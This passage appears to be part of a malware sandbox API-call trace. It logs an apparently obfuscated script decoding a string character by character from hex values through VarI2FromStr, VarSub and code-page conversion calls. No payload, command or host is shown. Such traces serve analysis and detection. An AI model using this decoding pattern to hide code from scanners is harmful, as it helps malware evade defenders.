lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.179] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.179] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.179] malloc (_Size=0xa0) returned 0x11f50080 [0175.179] free (_Block=0x11f50080) [0175.179] VarI2FromStr (in: strIn="&He4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.179] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.179] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.179] malloc (_Size=0xa0) returned 0x11f50080 [0175.179] free (_Block=0x11f50080) [0175.179] VarI2FromStr (in: strIn="&Ha7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.179] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0175.180] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.180] malloc (_Size=0xa0) returned 0x11f50080 [0175.180] free (_Block=0x11f50080) [0175.180] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.180] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0175.180] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.180] malloc (_Size=0xa0) returned 0x11f50080 [0175.180] free (_Block=0x11f50080) [0175.180] VarI2FromStr (in: strIn="&H8f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.180] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="9") returned 1 [0175.180] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.180] malloc (_Size=0xa0) returned 0x11f50080 [0175.180] free (_Block=0x11f50080) [0175.180] VarI2FromStr (in: strIn="&Hba", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.181] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.181] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.181] malloc (_Size=0xa0) returned 0x11f50080 [0175.181] free (_Block=0x11f50080) [0175.181] VarI2FromStr (in: strIn="&He5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.181] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.181] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.181] malloc (_Size=0xa0) returned 0x11f50080 [0175.181] free (_Block=0x11f50080) [0175.181] VarI2FromStr (in: strIn="&Hc9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.181] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="z") returned 1 [0175.181] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.181] malloc (_Size=0xa0) returned 0x11f50080 [0175.181] free (_Block=0x11f50080) [0175.181] VarI2FromStr (in: strIn="&Hd5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.182] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0175.182] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.182] malloc (_Size=0xa0) returned 0x11f50080 [0175.182] free (_Block=0x11f50080) [0175.182] VarI2FromStr (in: strIn="&He3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.182] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.182] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.182] malloc (_Size=0xa0) returned 0x11f50080 [0175.182] free (_Block=0x11f50080) [0175.182] VarI2FromStr (in: strIn="&Hb7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.182] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0175.182] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.183] malloc (_Size=0xa0) returned 0x11f50080 [0175.183] free (_Block=0x11f50080) [0175.183] VarI2FromStr (in: strIn="&Hbf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.183] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0175.183] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.183] malloc (_Size=0xa0) returned 0x11f50080 [0175.183] free (_Block=0x11f50080) [0175.183] VarI2FromStr (in: strIn="&Ha9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.183] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0175.183] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.205] malloc (_Size=0xa0) returned 0x11f50080 [0175.205] free (_Block=0x11f50080) [0175.205] VarI2FromStr (in: strIn="&Ha5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.205] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="7") returned 1 [0175.205] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.205] malloc (_Size=0xa0) returned 0x11f50080 [0175.205] free (_Block=0x11f50080) [0175.205] VarI2FromStr (in: strIn="&Ha9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.206] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0175.206] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.206] malloc (_Size=0xa0) returned 0x11f50080 [0175.206] free (_Block=0x11f50080) [0175.206] VarI2FromStr (in: strIn="&Hbb", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.206] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0175.206] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.206] malloc (_Size=0xa0) returned 0x11f50080 [0175.206] free (_Block=0x11f50080) [0175.206] VarI2FromStr (in: strIn="&Haf", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.206] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0175.206] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.207] malloc (_Size=0xa0) returned 0x11f50080 [0175.207] free (_Block=0x11f50080) [0175.207] VarI2FromStr (in: strIn="&Ha2", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.207] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0175.207] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.207] malloc (_Size=0xa0) returned 0x11f50080 [0175.207] free (_Block=0x11f50080) [0175.207] VarI2FromStr (in: strIn="&Hb8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.207] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0175.207] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.207] malloc (_Size=0xa0) returned 0x11f50080 [0175.207] free (_Block=0x11f50080) [0175.207] VarI2FromStr (in: strIn="&H92", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.208] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0175.208] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.208] malloc (_Size=0xa0) returned 0x11f50080 [0175.208] free (_Block=0x11f50080) [0175.208] VarI2FromStr (in: strIn="&Ha9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.208] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="9") returned 1 [0175.208] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.208] malloc (_Size=0xa0) returned 0x11f50080 [0175.208] free (_Block=0x11f50080) [0175.208] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.208] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.209] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.209] malloc (_Size=0xa0) returned 0x11f50080 [0175.209] free (_Block=0x11f50080) [0175.209] VarI2FromStr (in: strIn="&Hd7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.209] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0175.209] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.209] malloc (_Size=0xa0) returned 0x11f50080 [0175.209] free (_Block=0x11f50080) [0175.209] VarI2FromStr (in: strIn="&Hc8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.209] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="z") returned 1 [0175.209] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.209] malloc (_Size=0xa0) returned 0x11f50080 [0175.209] free (_Block=0x11f50080) [0175.210] VarI2FromStr (in: strIn="&He4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.210] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0175.210] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.210] malloc (_Size=0xa0) returned 0x11f50080 [0175.210] free (_Block=0x11f50080) [0175.210] VarI2FromStr (in: strIn="&Ha3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.210] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0175.210] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.210] malloc (_Size=0xa0) returned 0x11f50080 [0175.210] free (_Block=0x11f50080) [0175.210] VarI2FromStr (in: strIn="&Hb0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.210] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0175.211] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.211] malloc (_Size=0xa0) returned 0x11f50080 [0175.211] free (_Block=0x11f50080) [0175.211] VarI2FromStr (in: strIn="&Hd6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.211] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0175.211] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.211] malloc (_Size=0xa0) returned 0x11f50080 